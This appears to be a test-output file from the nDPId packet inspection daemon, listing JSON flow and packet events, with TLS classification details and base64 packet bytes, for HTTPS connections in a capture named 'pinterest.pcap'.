+00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"thread_ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="} +00686{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"thread_ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289717548,"flow_last_seen":1605289717548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289717548,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14612,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1605289717548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717548,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD4AAAAAoAL9ID+FAAACBAWgBAIICjGG9eUAAAAAAQMDBw=="} +00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14613,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605289717572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289717572,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIA0qAcsBIEmLB5kd7IUo3\/YpAbufvovR75juz2g\/oBJXgHfiAAACBAV4AQMDAwQCCArCuS86MYb15Q=="} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14614,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605289717572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289717572,"pkt":"qtsDr8lk5EKm5WPyht1gD67DACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACANn74Bu+7PaD+L0e+ZgBAB+\/vbAAABAQgKMYb1\/cK5Lzo="} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14615,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289717548,"flow_last_seen":1605289717572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289717572,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14617,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289717548,"flow_last_seen":1605289717605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289717605,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718346,"flow_last_seen":1605289718346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718346,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14833,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1605289718346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718346,"pkt":"qtsDr8lk5EKm5WPyht1gDn7LACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3mwBu1MbKQQ2nwhTgBBf5ZGnAAABAQgKdGByysK4e5A="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14834,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAqmhACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyRABu5dQgwPxqZaUgBAHqUTfAAABAQgKOIhalcK4e5A="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14835,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gA2s5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1CQBu69kJZnLb6S2gBAFvhEdAAABAQgKcHSqtcK4e5A="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289718347,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289718347,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14836,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605289718347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718347,"pkt":"qtsDr8lk5EKm5WPyht1gAtTRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACAK3yoBu80FVZetwjn1gBAB9Q24AAABAQgKVxL7HMK4e4A="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14837,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605289718372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718372,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbvebDafCFNTGykFgBALfUzsAAABAQgKwrkyWnReVSQ="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14838,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgMAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvfKq3COfXNBVWYgBALvWWfAAABAQgKwrkyYVcQ4ow="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14839,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJEPGplpSXUIMEgBALh6bdAAABAQgKwrkyYTiGPeg="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14840,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289718378,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUJMtvpLavZCWagBAL1W6tAAABAQgKwrkyYnBykDw="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289720502,"flow_last_seen":1605289720502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289720502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14887,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605289720502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720502,"pkt":"qtsDr8lk5EKm5WPyht1gDE+lACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgIBuwZ3AS1n9K5wgBAD7qJGAAABAQgK1mI428K4iuQ="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14888,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605289720592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289720592,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWAmf0rnAGdwEugBAMdPzqAAABAQgKwrk63tZgJbc="} +00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722442,"flow_last_seen":1605289722442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722442,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":46918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14889,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605289722442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722442,"pkt":"qtsDr8lk5EKm5WPyht1gCa8jACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt0YBu4XaMRXguiMogBAB9ZuaAAABAQgKldeDu8K4iwE="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289722610,"flow_last_seen":1605289722610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289722610,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14890,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605289722610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722610,"pkt":"qtsDr8lk5EKm5WPyht1gDvD\/ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElgYBu\/ADYY+SLdnAgBBf+pZ\/AAABAQgK1mJBF8K4kuY="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14891,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605289722621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3RuC6IyiF2jEWgBAM4PFAAAABAQgKwrlC85XVazg="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14892,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605289722642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289722642,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWBpIt2cDwA2GQgBAQS035AAABAQgKwrlDCNZgKSs="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726574,"flow_last_seen":1605289726574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726574,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14986,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605289726574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726574,"pkt":"qtsDr8lk5EKm5WPyht1gD7DqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyPYBuy7xct5PemhygBASWTvxAAABAQgKOIh6ucK4opo="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289726582,"flow_last_seen":1605289726582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289726582,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14987,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605289726582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726582,"pkt":"qtsDr8lk5EKm5WPyht1gBy5HACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKukIBu0Ah3sUn+OyVgBAB9Rf+AAABAQgKqS9zVcK4oqI="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14988,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605289726621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726621,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvI9k96aHIu8XLfgBAL06eYAAABAQgKwrlSlDiGZZ4="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14989,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605289726637,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289726637,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6Qif47JVAId7GgBALvHMdAAABAQgKwrlSpKktXm0="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gDHlsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADvvoBu4vV8Grv31OMgBACdmBfAAABAQgK5dFc6cK4oqI="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 